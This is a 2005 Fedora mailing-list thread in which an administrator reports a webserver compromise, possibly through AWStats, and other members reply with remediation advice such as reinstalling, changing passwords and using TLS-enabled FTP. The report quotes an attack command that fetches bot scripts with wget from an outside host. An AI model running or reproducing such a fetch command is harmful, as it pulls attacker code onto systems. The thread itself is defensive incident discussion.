Server compromissed

[dan]

paul at topguncomputers.com wrote:
>>On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
>><paul at topguncomputers.com> wrote:
>>
>>>Apparently someone has hacked into my webserver.  And is installing perl
>>>scripts into he /tmp/ directory.  There usually named .linuxday* or
>>>.cinta* and a few other names as well.
>>>
>>>>From what I can tell something is causing apache to run a command like
>>>"sh
>>>wget  bot.linuxday.com.br -O {the above mentioned files are than
>>>listed}"
>>>
>>>sometimes the site is worm.linuxday.com.br
>>>
>>>I'm curious if anyone has heard about this before.  I'm currently
>>>running
>>>Fedora 1  with all the latests security patches.
>>
>>The only way to ensure your system is clean, and likely to remain clean,
>>is to:
>>
>>1. Do a bare metal install
>>2. Change all passwords to new strong passwords
>>3. Disable cleartext services, ftp, telnet, rsh, etc.
>>4. Disable root remote login (use su or sudo)
>>5. Restore your uncompromised data
>>6. etc.
>>I had to do this for a client and the next 3 days the intruder tried
>>to get back in.
>>
>>--
>>Leonard Isham, CISSP
>>Ostendo non ostento.
>>
>>--
>>fedora-list mailing list
>>fedora-list at redhat.com
>>To unsubscribe: http://www.redhat.com/mailman/listinfo/fedora-list
>>
> 
> 
> In replace of FTP what would you suggest. That is the only clear text
> password service I allow. So what else can I use in replace of that.
> 
> And shell access is denied for all accounts.  except for 2.
> 
> I get the feeling this came in on awstats all though I'm not 100% positive
> and I'm wanting to find out how it got in first before I just delete and
> restart over again.
> 

That AWStats hit me a couple times, which sucked.  I had all kinds of 
cool movies put on the server by whoever popped it.

But in all seriousness, vsftpd uses tls/ssl connections, so you can 
avoid cleartext passwords altogether.  It's working quite nicely for me.

Hope that helps
-dant